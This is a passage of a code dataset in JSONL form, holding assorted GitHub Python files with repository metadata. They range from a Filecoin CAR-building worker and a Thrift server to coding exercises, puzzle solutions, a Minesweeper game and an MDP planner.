(\n file_iter[0], landing_spot))\n else:\n pathing = file_iter[0].split('.ptolemy')\n split_file(pathing[0], piece_size, project_meta[0])\n root = os.path.split(file_iter[0])\n car_stage = os.path.join(project_meta[0], cariter)\n landing_spot = os.path.join(car_stage, root[0][1:])\n os.makedirs(landing_spot, exist_ok=True)\n shutil.move(temp, landing_spot)\n logging.debug(\"Placed file %s in car staging area %s.\" % (\n file_iter[0], landing_spot))\n else:\n root = os.path.split(file_iter[0])\n car_stage = os.path.join(project_meta[0], cariter)\n landing_spot = os.path.join(car_stage, root[0][1:])\n os.makedirs(landing_spot, exist_ok=True)\n shutil.copy(file_iter[0], landing_spot)\n logging.debug(\"Placed file %s in car staging area %s.\" %\n (file_iter[0], landing_spot))\n except(Exception) as error:\n logging.error(error)\n\n logging.info(\n \"Finished building car container %s and placing it in our staging area.\" % cariter)\n\n try:\n\n car_path = os.path.join(project_meta[0], cariter)\n\n command = car_util + \" c --version 1 -f %s.car %s\"\n logging.info(\"Executing command go-car for dir %s\" % cariter)\n result = subprocess.run(command % (\n car_path, car_path), capture_output=True, shell=True)\n\n stream_cmd = \"cat %s | \" + stream_util\n root_cmd = car_util + 
\" root %s\"\n logging.info(\"Calculating root CID and commp for %s\" % cariter)\n target_car = os.path.join(project_meta[0], cariter + \".car\")\n root_result = subprocess.run(\n (root_cmd % target_car), capture_output=True, shell=True, text=True)\n commp_result = subprocess.run(\n (stream_cmd % target_car), capture_output=True, check=True, text=True, shell=True)\n out = commp_result.stderr.strip()\n\n commp_re = re.compile('CommPCid: (b[A-Za-z2-7]{58,})')\n corrupt_re = re.compile('\\*CORRUPTED\\*')\n padded_piece_re = re.compile('Padded piece:\\s+(\\d+)\\sbytes')\n payload_re = re.compile('Payload:\\s+(\\d+)\\sbytes')\n\n commp_m = commp_re.findall(out)\n corrupt = corrupt_re.match(out)\n padded_piece_m = padded_piece_re.findall(out)\n payload_m = payload_re.findall(out)\n\n sql_command = \"UPDATE ptolemy_cars SET cid=\\'%s\\', commp=\\'%s\\', size=%i, padded_size=%i, processed='t' WHERE car_id=\\'%s\\';\"\n cursor.execute(sql_command % (root_result.stdout.strip(), commp_m[0], int(\n payload_m[0]), int(padded_piece_m[0]), cariter))\n conn.commit()\n new_car_name = os.path.join(project_meta[0], commp_m[0] + \".car\")\n shutil.move(target_car, new_car_name)\n\n conn.close()\n\n # clean up the staging directory\n shutil.rmtree(car_path)\n\n except(Exception) as error:\n logging.error(error)\n conn.rollback()\n conn.close()\n\n#\n#\n#\n\n\n@app.post(\"/v0/blitz/{project}\")\ndef blitz_build(project: str, background_tasks: BackgroundTasks):\n background_tasks.add_task(blitz, project)\n return {\"Message\": \"Worker performing blitz build in background.\"}\n\n#\n# Run the blitz\n#\n\n\ndef blitz(project: str):\n\n executor = ThreadPoolExecutor(int(config.get('worker', 'threads')))\n futures = []\n\n dbmgr = dbmanager.DbManager()\n car_command = \"SELECT car_id FROM ptolemy_cars WHERE worker_ip = '%s' AND project = '%s';\"\n car_files = dbmgr.exe_fetch_all(car_command % (\n config.get('worker', 'ip_addr'), project))\n\n logging.info(\"Identified %i car files for %s worker to build.\" %\n (len(car_files), config.get('worker', 'ip_addr')))\n\n for iter in car_files:\n logging.info(\"Allocating a thread to build container: %s\" % iter[0])\n futures.append(executor.submit(process_car, iter[0], project))\n\n logging.info(\"Size of futures is: %i\" % len(futures))\n\n for future in futures:\n future.result()\n\n return {\"message\": \"Cars have been added to worker, starting processing job.\"}\n","repo_name":"schreck23/ptolemy","sub_path":"worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":9773,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"6958810583","text":"def main():\n\n # one method of splitting string\n my_string = 'hello'\n my_list = []\n for letter in my_string:\n my_list.append(letter)\n print(my_list)\n\n # same thing, one line\n my_list = [letter for letter in my_string]\n print(my_list)\n\n new_list = [num for num in range(0,11)]\n print(new_list)\n new_list = [num**2 for num in range(0,11)]\n print(new_list)\n\n # can have conditionals inside\n new_list = [num for num in range(0,11) if num%2==0]\n print(new_list)\n\n # can perform calculations inside\n degrees_C = [0,10,20,100]\n degrees_F = [((9/5)*temp+32) for temp in degrees_C]\n print(degrees_C)\n print(degrees_F)\n\n # get first letter of each work using list comprehension\n my_string = 'this is my string'\n my_list = [word[0] for word in my_string.split()]\n print(my_list)\n\n\n 
pass\nmain()\n","repo_name":"akirtley/python_review_course","sub_path":"section_2_python_statements/list_comprehension.py","file_name":"list_comprehension.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4998809414","text":"#!/usr/bin/env python 3\n\n############################################################################################\n# #\n# Program purpose: Creates multiple lists. #\n# Program Author : Happi Yvan #\n# Creation Date : November 18, 2019 #\n# #\n############################################################################################\n\ndef obtain_user_size(input_mess: str) -> int:\n is_valid, user_data = False, int(-1)\n while is_valid is False:\n try:\n user_data = int(input(input_mess))\n if user_data < 0:\n raise ValueError('Invalid number of list.')\n is_valid = True\n except ValueError as ve:\n print(f'[ERROR]: {ve}')\n return user_data\n\ndef create_multiple_lists(max_size: int) -> dict:\n obj = dict()\n for i in range(1, max_size+1):\n obj[str(i)] = []\n return obj\n\nif __name__ == \"__main__\":\n\n user_size = obtain_user_size(input_mess='Enter max number of lists: ')\n multi_list = create_multiple_lists(max_size=user_size)\n print(f'Generated List:\\n{multi_list}')\n","repo_name":"ivenpoker/Python-Projects","sub_path":"Projects/Online Workouts/w3resource/List/program-41.py","file_name":"program-41.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12144474154","text":"import hashlib\nimport time\n\n\ndef getzftsl():\n _time = str(int(time.time()) - 5)\n # print(_time)\n _md5_str = \"zfsw_\" + _time[:-1]\n m = hashlib.md5(_md5_str.encode(\"utf-8\"))\n # print(\"zftsl: \"+m.hexdigest())\n return m.hexdigest()\n\n\nif __name__ == '__main__':\n zftsl = getzftsl()\n print(zftsl)\n","repo_name":"relaxcn/zhimiao_proxy","sub_path":"util/getZFTSL.py","file_name":"getZFTSL.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7018603904","text":"import unittest\nimport copy\n\nfrom explainshell import fixer, options, store\n\nclass test_fixer(unittest.TestCase):\n def setUp(self):\n self._oldfixerscls = fixer.fixerscls[:]\n\n def tearDown(self):\n fixer.fixerscls = self._oldfixerscls\n\n def test_changes(self):\n class myfixer(fixer.basefixer):\n def pre_get_raw_manpage(self):\n self.mctx['foo'] = 'bar'\n\n d = {}\n fixer.fixerscls = [myfixer]\n r = fixer.runner(d)\n self.assertTrue('foo' not in d)\n r.pre_get_raw_manpage()\n self.assertEquals(d['foo'], 'bar')\n\n def test_paragraphjoiner(self):\n maxdistance = fixer.paragraphjoiner.maxdistance\n\n paragraphs = [store.paragraph(i, chr(ord('a') + i), None, False) for i in range(26)]\n options = [\n store.option(paragraphs[0], [], [], False),\n store.option(paragraphs[1], [], [], False),\n store.option(paragraphs[5], [], [], False),\n store.option(paragraphs[5+maxdistance-1], [], [], False),\n store.option(paragraphs[15], [], [], False),\n store.option(paragraphs[17], [], [], False),\n store.option(paragraphs[-1], [], [], False)]\n\n f = fixer.paragraphjoiner(None)\n merged = f._join(paragraphs, options)\n\n #self.assertEquals(merged, 7)\n #self.assertEquals(len(paragraphs), 19)\n self.assertEquals(options[0].text, 'a')\n self.assertEquals(options[1].text.replace('\\n', ''), 'bcde')\n 
self.assertEquals(options[2].text.replace('\\n', ''), 'fghi')\n self.assertEquals(options[3].text, 'j')\n self.assertEquals(options[4].text.replace('\\n', ''), 'pq')\n self.assertEquals(options[5].text, 'r')\n self.assertEquals(options[6].text, 'z')\n\n # join again to make sure nothing is changed\n oldparagraphs = copy.deepcopy(paragraphs)\n oldoptions = copy.deepcopy(options)\n f._join(paragraphs, options)\n self.assertEquals(oldparagraphs, paragraphs)\n self.assertEquals(oldoptions, options)\n","repo_name":"idank/explainshell","sub_path":"tests/test-fixer.py","file_name":"test-fixer.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":12432,"dataset":"github-code","pt":"48"} +{"seq_id":"43587165928","text":"width = 25\nheight = 6\n\nwith open('in', 'r') as infile:\n line = infile.readline()\n size = width * height\n layers = [line[i:i + size] for i in range(0, len(line), size)]\n\n pixels = {}\n for i, layer in enumerate(layers):\n rows = [layer[i: i + width] for i in range(0, len(layer), width)]\n for y in range(height):\n for x in range(width):\n px = pixels.get((x, y), {})\n px[i] = rows[y][x]\n pixels[(x, y)] = px\n\n final_image = {}\n for coord, l in pixels.items():\n for n in range(len(l)):\n val = l[n]\n if val != '2':\n final_image[coord] = val\n break\n\n for x in range(width+1):\n print('#', end='')\n print('')\n for y in range(height):\n print('#', end='')\n for x in range(width):\n color = final_image[(x, y)]\n if color == '0':\n print('#', end='')\n elif color == '1':\n print(' ', end='')\n print('')\n for x in range(width+1):\n print('#', end='')\n","repo_name":"bo0tzz/AdventOfCode","sub_path":"2019/08/08.2.py","file_name":"08.2.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42453723809","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def maxProduct(self, root: Optional[TreeNode]) -> int:\n self.values = []\n root_sum = self.get_sum_of_node(root)\n\n maximum = 0\n for val in self.values:\n product = val * (root_sum - val)\n if product > maximum:\n maximum = product\n return maximum % (pow(10, 9) + 7)\n\n def get_sum_of_node(self, node):\n if not node:\n return 0\n\n self_sum = self.get_sum_of_node(node.left) + \\\n self.get_sum_of_node(node.right) + node.val\n self.values.append(self_sum)\n\n return self_sum\n","repo_name":"versenyi98/programming-contests","sub_path":"LeetCode/1339. 
Maximum Product of Splitted Binary Tree/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"7964432109","text":"from config import PILAS_SCREEN_X, PILAS_SCREEN_Y\n\n\ndef esta_fuera_de_la_pantalla(actor):\n if actor.fijo:\n return False\n\n izquierda = -PILAS_SCREEN_X / 2\n derecha = PILAS_SCREEN_X / 2\n arriba = PILAS_SCREEN_Y / 2\n abajo = -PILAS_SCREEN_Y / 2\n return actor.derecha < izquierda or \\\n actor.izquierda > derecha or \\\n actor.abajo > arriba or \\\n actor.arriba < abajo\n\n\ndef crear_bombas(bombas, actor):\n for i in range(2):\n bombas.agregar(actor())\n\n for bomba in bombas:\n if esta_fuera_de_la_pantalla(bomba):\n bomba.iniciar()\n","repo_name":"humitos/ballsgame","sub_path":"ballsgame/utilidades.py","file_name":"utilidades.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2857999810","text":"# mdp implementation needs to go here\nimport sys\nimport copy\n\ndef mdp(config):\n#inputs 1-5 used in A*\n\tstart = config['starting_pos']\n\tgoal = config['goal']\n\twalls = config['walls']\n\tpits = config['pits']\n\tmove_list = config['possible_moves']\n\tmap_size = config['map_size']\n\n#probabilities of correct movements\n\tprob_f = config['prob_move_forward']\n\tprob_b = config['prob_move_backward']\n\tprob_l = config['prob_move_left']\n\tprob_r = config['prob_move_right']\n\n#rewards for things\n\treward_step = config['reward_for_each_step']\n\treward_wall = config['reward_for_hitting_wall']\n\treward_goal = config['reward_for_reaching_goal']\n\treward_pit = config['reward_for_falling_in_pit']\n\n#numbers important for the mdp algorithm\n\tdiscount_factor = config['discount_factor']\n\tmax_iterations = config['max_iterations']\n\tthreshold_difference = config['threshold_difference'] \n\n\tpolicy_map = [[\"\" for y in range(map_size[1])] for x in range(map_size[0])]\n\n\tvalue_map = [[0.0 for y in range(map_size[1])] for x in range(map_size[0])]\n\n\tfor wall in walls:\n\t\tpolicy_map[wall[0]][wall[1]] = \"WALL\"\n\t\tvalue_map[wall[0]][wall[1]] =0.0# reward_wall \n\tfor pit in pits:\n\t\tpolicy_map[pit[0]][pit[1]] = \"PIT\"\n\t\tvalue_map[pit[0]][pit[1]] = 0.0#reward_pit\n\n\tpolicy_map[goal[0]][goal[1]] = \"GOAL\"\n\tvalue_map[goal[0]][goal[1]] = 0.0#reward_goal \n\n\n\titerations = 0\n\tconverge = 0\n#TODO still need to figure publishing\n# this is the FULLY OPERATIONAL mdp\n\twhile(iterations < max_iterations):\n\t\tnew_value_map = copy.deepcopy(value_map)\n\t\t#iterate through each cell and calculate the thing\n\t\tfor row,(rowp,rowv) in enumerate(zip(policy_map,value_map)):\n\t\t\tfor col,(valp,valv) in enumerate(zip(rowp,rowv)):\n\t\t\t\t#iterate through all possible moves from a cell\n\t\t\t\tif valp == \"WALL\" or valp == \"GOAL\" or valp == \"PIT\":\n\t\t\t\t\tcontinue\n\t\t\t\tmaxv = -sys.maxint-1 \n\t\t\t\tmaxp = \"\"\n\t\t\t\tfor move in move_list:\n\t\t\t\t\tif not row+move[0] in range(0,map_size[0]) or not col+move[1] in range(0,map_size[1]):\n\t\t\t\t\t\tforward = valv \n\t\t\t\t\t\treward_f = reward_wall\n\t\t\t\t\telse:\n\t\t\t\t\t\tforward = new_value_map[row+move[0]][col+move[1]]\n\t\t\t\t\t\tcell = policy_map[row+move[0]][col+move[1]]\n\t\t\t\t\t\treward_f = reward_step\n\t\t\t\t\t\tif cell == \"GOAL\":\n\t\t\t\t\t\t\treward_f += reward_goal\n\t\t\t\t\t\tif cell == \"PIT\":\n\t\t\t\t\t\t\treward_f += 
reward_pit\n\t\t\t\t\t\tif cell == \"WALL\":\n\t\t\t\t\t\t\tforward = valv\n\t\t\t\t\t\t\treward_f = reward_wall\n\n\t\t\t\t\tif not row-move[0] in range(0,map_size[0]) or not col-move[1] in range(0,map_size[1]):\n\t\t\t\t\t\tbackward = valv \n\t\t\t\t\t\treward_b = reward_wall\n\t\t\t\t\telse:\n\t\t\t\t\t\tbackward =new_value_map[row-move[0]][col-move[1]]\n\t\t\t\t\t\tcell =policy_map[row-move[0]][col-move[1]]\n\t\t\t\t\t\treward_b = reward_step\n\t\t\t\t\t\tif cell == \"GOAL\":\n\t\t\t\t\t\t\treward_b += reward_goal\n\t\t\t\t\t\tif cell == \"PIT\":\n\t\t\t\t\t\t\treward_b += reward_pit\n\t\t\t\t\t\tif cell == \"WALL\":\n\t\t\t\t\t\t\tbackward = valv\n\t\t\t\t\t\t\treward_b = reward_wall\n\n\t\t\t\t\tif not row-move[1] in range(0,map_size[0]) or not col-move[0] in range(0,map_size[1]):\n\t\t\t\t\t\tleft = valv\n\t\t\t\t\t\treward_l = reward_wall\n\t\t\t\t\telse:\n\t\t\t\t\t\tleft = new_value_map[row-move[1]][col-move[0]]\n\t\t\t\t\t\tcell = policy_map[row-move[1]][col-move[0]]\n\t\t\t\t\t\treward_l = reward_step\n\t\t\t\t\t\tif cell == \"GOAL\":\n\t\t\t\t\t\t\treward_l += reward_goal\n\t\t\t\t\t\tif cell == \"PIT\":\n\t\t\t\t\t\t\treward_l += reward_pit\n\t\t\t\t\t\tif cell == \"WALL\":\n\t\t\t\t\t\t\tleft = valv\n\t\t\t\t\t\t\treward_l = reward_wall\n\n\t\t\t\t\tif not row+move[1] in range(0,map_size[0]) or not col+move[0] in range(0,map_size[1]): \n\t\t\t\t\t\tright = valv\n\t\t\t\t\t\treward_r = reward_wall\n\t\t\t\t\telse:\n\t\t\t\t\t\tright = new_value_map[row+move[1]][col+move[0]]\n\t\t\t\t\t\tcell = policy_map[row+move[1]][col+move[0]]\n\t\t\t\t\t\treward_r = reward_step\n\t\t\t\t\t\tif cell == \"GOAL\":\n\t\t\t\t\t\t\treward_r += reward_goal\n\t\t\t\t\t\tif cell == \"PIT\":\n\t\t\t\t\t\t\treward_r += reward_pit\n\t\t\t\t\t\tif cell == \"WALL\":\n\t\t\t\t\t\t\tright = valv\n\t\t\t\t\t\t\treward_r = reward_wall\n\n\t\t\t\t\tv_f = prob_f*(reward_f+(discount_factor*forward))\n\t\t\t\t\tv_b = prob_b*(reward_b+(discount_factor*backward))\n\t\t\t\t\tv_l = prob_l*(reward_l+(discount_factor*left))\n\t\t\t\t\tv_r = prob_r*(reward_r+(discount_factor*right))\n\t\t\t\t\tsumm = v_f + v_b + v_l + v_r\n\n\t\t\t\t\t#get the maximum value and policy\n\t\t\t\t\tif summ > maxv:\n\t\t\t\t\t\tmaxv = summ\n\t\t\t\t\t\tif move == [0,1]:\n\t\t\t\t\t\t\tmaxp = \"E\"\n\t\t\t\t\t\telif move == [0,-1]:\n\t\t\t\t\t\t\tmaxp = \"W\"\n\t\t\t\t\t\telif move == [1,0]:\n\t\t\t\t\t\t\tmaxp = \"S\"\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tmaxp = \"N\"\n\t\t\t\tpolicy_map[row][col] = maxp\n\t\t\t\tnew_value_map[row][col] = maxv\n\n\n\t\t\n\t\t#determine convergence\n\t\tdiff = absolute_diff(value_map,new_value_map,policy_map)\n\t\tif diff < threshold_difference:\n\t\t\tconverge += 1\n\t\telse:\n\t\t\tconverge = 0\n\n\t\tvalue_map = new_value_map\n\t\titerations += 1\n\t\tif converge == 2:\n\t\t\tbreak\n\t\n#flat_policy_map = [x for y in policy_map for x in y]\n\treturn policy_map\n\n\n\n\n#function for finding absolute difference to determine convergence\ndef absolute_diff(a,b,policy_map):\n\tsumm = 0\n\tfor rowv_a,rowv_b,rowp in zip(a,b,policy_map):\n\t\tfor colv_a,colv_b,colp in zip(rowv_a,rowv_b,rowp):\n\t\t\tif colp != \"WALL\" and colp != \"PIT\" and colp != \"GOAL\":\n\t\t\t\tsumm += abs(colv_a-colv_b)\n\treturn summ\n","repo_name":"andynaguyen/cse190_final_assignment","sub_path":"scripts/mdp.py","file_name":"mdp.py","file_ext":"py","file_size_in_byte":4948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43149556874","text":"# All Elements in Two Binary 
Search Trees\n\n# Given two binary search trees root1 and root2.\n#\n# Return a list containing all the integers from both trees sorted in ascending order.\n#\n#\n#\n# Example 1:\n#\n#\n# Input: root1 = [2,1,4], root2 = [1,0,3]\n# Output: [0,1,1,2,3,4]\n# Example 2:\n#\n# Input: root1 = [0,-10,10], root2 = [5,1,7,0,2]\n# Output: [-10,0,0,1,2,5,7,10]\n# Example 3:\n#\n# Input: root1 = [], root2 = [5,1,7,0,2]\n# Output: [0,1,2,5,7]\n# Example 4:\n#\n# Input: root1 = [0,-10,10], root2 = []\n# Output: [-10,0,10]\n# Example 5:\n#\n#\n# Input: root1 = [1,null,8], root2 = [8,1]\n# Output: [1,1,8,8]\n#\n#\n# Constraints:\n#\n# Each tree has at most 5000 nodes.\n# Each node's value is between [-10^5, 10^5].\n\n# Definition for a binary tree node.\nfrom typing import List\n\n\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def getAllElements(self, root1: TreeNode, root2: TreeNode) -> List[int]:\n def middle_order(node: TreeNode, l: List[int]):\n if node:\n middle_order(node.left, l)\n l.append(node.val)\n middle_order(node.right, l)\n\n res = []\n l1 = []\n l2 = []\n middle_order(root1, l1)\n middle_order(root2, l2)\n i = 0\n j = 0\n while i < len(l1) and j < len(l2):\n if l1[i] <= l2[j]:\n res.append(l1[i])\n i += 1\n else:\n res.append(l2[j])\n j += 1\n\n while i < len(l1):\n res.append(l1[i])\n i += 1\n\n while j < len(l2):\n res.append(l2[j])\n j += 1\n return res\n","repo_name":"TTVidi/leetcode-python","sub_path":"src/leetcode/medium/solution1305.py","file_name":"solution1305.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36882101585","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n__author__ = 'David Zhang'\n\nfrom thrift import Thrift\nfrom thrift.transport import TSocket, TTransport\nfrom thrift.protocol import TCompactProtocol\nfrom thrift.server import TServer\nfrom pythrift import PersonService, ttypes\n\n\nclass PersonServiceHandler(PersonService.Iface):\n\n def getPersonByUsername(self, username):\n return ttypes.Person(username, 20, False)\n\n def savePerson(self, person):\n print(person)\n\n\nif __name__ == '__main__':\n try:\n TServer.TSimpleServer(\n PersonService.Processor(PersonServiceHandler()),\n # 注意py3的socket tcp通信默认采用tcpv6\n TSocket.TServerSocket(host='127.0.0.1', port=8899),\n TTransport.TFramedTransportFactory(),\n TCompactProtocol.TCompactProtocolFactory()\n ).serve()\n except Thrift.TException as ex:\n print(ex)\n\n","repo_name":"ZhangQi1996/netty-all","sub_path":"thrift/src/main/python/rpc_proj/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3704701378","text":"import distutils.core\n\ntry:\n\timport setuptools\nexcept ImportError:\n\tpass\n\nwith open('README.md', 'r') as fh:\n\tlong_description = fh.read()\n\npackages = ['tornado', 'pyconvert']\n\ndistutils.core.setup(\n\tname='aiopyrestful',\n\tversion='1.4.1',\n\tpackages=['aiopyrestful'],\n\tauthor='DarHarry',\n\tauthor_email='harryx520@qq.com',\n\tdescription='Restful framework with Tornado',\n\tlong_description=long_description,\n\tlong_description_content_type=\"text/markdown\",\n\turl='https://github.com/HarryHEi/aiopyrestful',\n\tinstall_requires=packages,\n\tclassifiers=[\n\t\t'Programming Language :: Python :: 
3'\n\t]\n)\n","repo_name":"HarryHEi/aiopyrestful","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"15198799687","text":"import entity\nimport event_handlers\nimport fonts\nimport minefield\nimport game_loop\n\nW = 50\nH = 50\ngrid = []\nfirst_click = True\nmines: minefield.MineField\nmine_size = 10\nnum_mines = 20\n\n\nclass Button(entity.Entity):\n mines_around: int\n\n def __init__(self, x, y, index_x, index_y):\n super().__init__(x, y, W, H)\n self.index_x = index_x\n self.index_y = index_y\n self.mined = self.flagged = False\n\n self.set_color((255, 255, 255))\n\n def mine(self):\n if not self.flagged:\n self.mined = True\n self.set_color((0, 0, 0))\n if self.is_mine():\n for b in grid:\n if b.is_mine():\n b.set_color((128, 128, 128))\n elif b.flagged:\n b.set_color((255, 255, 255))\n game_loop.playing = False\n elif self.mines_around == 0:\n self.mine_surrounding()\n elif self.mines_around != 0:\n self.show_mine_number()\n\n check_win()\n\n def flag(self):\n if self.flagged:\n mines.flags += 1\n self.flagged = False\n self.set_color((255, 255, 255))\n self.show_mine_number()\n elif not self.mined and mines.flags > 0:\n mines.flags -= 1\n self.flagged = True\n self.set_color((255, 0, 0))\n mines.check_mines()\n\n def mine_surrounding(self):\n for button in self.get_all_buttons_around():\n if not button.mined and not button.flagged and not button.is_mine():\n button.mine()\n\n def show_mine_number(self):\n if self.mines_around != 0 and not self.is_mine():\n self.img.blit(fonts.main_font.render(str(self.mines_around), False, (255, 255, 255)), (5, 3))\n\n def is_mine(self):\n return mines.has_mine[self.index_x][self.index_y]\n\n def get_mines_around(self):\n num = 0\n for x in range(max(self.index_x - 1, 0), min(self.index_x + 2, mine_size), 1):\n for y in range(max(self.index_y - 1, 0), min(self.index_y + 2, mine_size), 1):\n if (x != self.index_x or y != self.index_y) and mines.has_mine[x][y]:\n num += 1\n return num\n\n def get_buttons_around(self):\n buttons = []\n for x in range(max(self.index_x - 1, 0), min(self.index_x + 2, mine_size), 1):\n for y in range(max(self.index_y - 1, 0), min(self.index_y + 2, mine_size), 1):\n if (x + y) % 2 != (self.index_y + self.index_x) % 2:\n buttons.append(grid[mine_size * x + y])\n return buttons\n\n def get_all_buttons_around(self, num_spaces=1):\n buttons = []\n for index in self.get_surrounding_indexes(num_spaces):\n buttons.append(grid[index])\n return buttons\n\n def on_first_click(self):\n global mines\n indexes = self.get_surrounding_indexes(2)\n indexes.append(self.index_x * mine_size + self.index_y)\n mines = minefield.MineField(mine_size, num_mines, indexes)\n\n for button in grid:\n if button.is_mine():\n mines.mines.append(button)\n button.mines_around = button.get_mines_around()\n\n def get_surrounding_indexes(self, num_spaces=1):\n indexes = []\n for x in range(max(self.index_x - num_spaces, 0), min(self.index_x + num_spaces + 1, mine_size), 1):\n for y in range(max(self.index_y - num_spaces, 0), min(self.index_y + num_spaces + 1, mine_size), 1):\n if x != self.index_x or self.index_y != y:\n indexes.append(x * mine_size + y)\n return indexes\n\n\ndef check_win():\n for button in grid:\n if not button.is_mine():\n if not button.mined:\n return\n game_loop.won = True\n\n\ndef create_grid(pos, length):\n global grid\n for i in range(length):\n for j in range(length):\n 
grid.append(Button(pos[0] + i * (W + 5), pos[1] + j * (H + 5), i, j))\n return grid\n\n\ndef button_in_grid(pos):\n for button in grid:\n if button.intersects_point(pos):\n return button\n","repo_name":"ChadTheSecondEthan/minesweeper","sub_path":"button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":4160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32515696276","text":"\nfrom ctypes import util\nimport traceback\n\nimport logging\nlogger = logging.getLogger(__name__)\n\nfrom .utils.settings import WechatSettings\n\nwechat_settings = WechatSettings()\n\nfrom .admins import (\n WechatConfiguration as WechatConfigurationAdmin,\n WechatUser as WechatUserAdmin,\n)\nfrom .models import (\n WechatConfiguration as WechatConfigurationModel,\n WechatUser as WechatUserModel,\n)\n\n\n\nclass Wechat:\n\n def __init__(self,app=None,admin=None,db=None):\n if None not in [app,admin,db,]:\n self.init_app(app,admin,db)\n\n def init_app(self,app,admin,db):\n\n app.wechat = self\n\n admin.add_view(WechatConfigurationAdmin(name='微信设置',category=\"微信数据\"))\n admin.add_view(WechatUserAdmin(WechatUserModel, db.session, name=u'微信用户',category=\"微信数据\"))\n\n from .views.v1 import bp as bp_views\n app.register_blueprint(\n bp_views,\n url_prefix='/{}/wechat/'.format(\n app.config['PROJECT_NAME'],\n )\n )\n\n from .apis.v1 import (\n bp as bp_apis,\n )\n app.register_blueprint(\n bp_apis,\n url_prefix='/{}/api/v1/'.format(\n app.config['PROJECT_NAME'],\n )\n )\n","repo_name":"cllen/boilerplate-flask","sub_path":"server/applications/wechat/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9534972410","text":"'''\nCounting Organizations\nThis application will read the mailbox data (mbox.txt) count up the number\nemail messages per organization (i.e. 
domain name of the email address)\nusing a database with the following schema to maintain the counts.\n'''\n\n\nimport sqlite3, re\n\nconn = sqlite3.connect('email-db.sqlite')\ncurs = conn.cursor()\n\ncurs.execute('DROP TABLE IF EXISTS Counts')\ncurs.execute('CREATE TABLE Counts (org TEXT, count INTEGER)')\n\nfh = open('mbox.txt')\nfor line in fh:\n    if not line.startswith('From: ') : continue\n    email = \"\".join(re.findall('(?<=@).+', line))\n    print (email)\n    \n    curs.execute('SELECT count FROM Counts WHERE org=?', (email, ))\n    row = (curs.fetchone())\n    if row is None:\n        curs.execute('INSERT INTO Counts (org, count) VALUES (?, 1)', (email,))\n    else:\n        curs.execute('UPDATE Counts SET count=count+1 WHERE org=?', (email,))\n    conn.commit()\n\ncurs.close()\n","repo_name":"sujinleeme/my-python-journey","sub_path":"PR4E/Database/week2.py","file_name":"week2.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"32224143396","text":"from shape_parser import Program, ProgramLine\nfrom typing import List, Union\nimport networkx as nx\nimport matplotlib.pyplot as plt\n\ndef create_graph_from_program(program: Program) -> nx.DiGraph:\n    G = nx.DiGraph()\n    for program_line in program.program_lines:\n        G.add_edge(*program_line.get_edge_label())\n    return G\n\nclass ControlFlowGraph:\n    def __init__(self, program: Program):\n        self.program: Program = program\n        self.nodes: List[int] = self.program.get_all_labels()\n    \n    def plot_graph(self):\n        graph: nx.DiGraph = create_graph_from_program(self.program)\n        pos = nx.spring_layout(graph)\n        plt.figure()\n\n        edge_labels: dict = {}\n        for program_line in self.program.program_lines:\n            edge_labels[program_line.get_edge_label()] = str(program_line.command)\n\n        nx.draw(graph, pos=pos, edge_color='black', width=1, linewidths=1, node_size=500, node_color='cyan',\n                labels={node: node for node in graph.nodes()})\n        \n        nx.draw_networkx_edge_labels(graph, pos,\n                                     edge_labels={program_line.get_edge_label(): str(program_line.command)\n                                                  for program_line in self.program.program_lines},\n                                     font_size=16)\n\n        plt.show()\n\n    def ingoing_edges(self, node: int) -> List[ProgramLine]:\n        return [program_line for program_line in self.program.program_lines\n                if program_line.end_label == node]\n\n    def outgoing_edges(self, node: int) -> List[ProgramLine]:\n        return [program_line for program_line in self.program.program_lines\n                if program_line.start_label == node]\n\n    def find_start_label(self) -> int:\n        for node in self.nodes:\n            if len(self.ingoing_edges(node)) == 0:\n                return node\n        raise SyntaxError(\"Could not find a starting 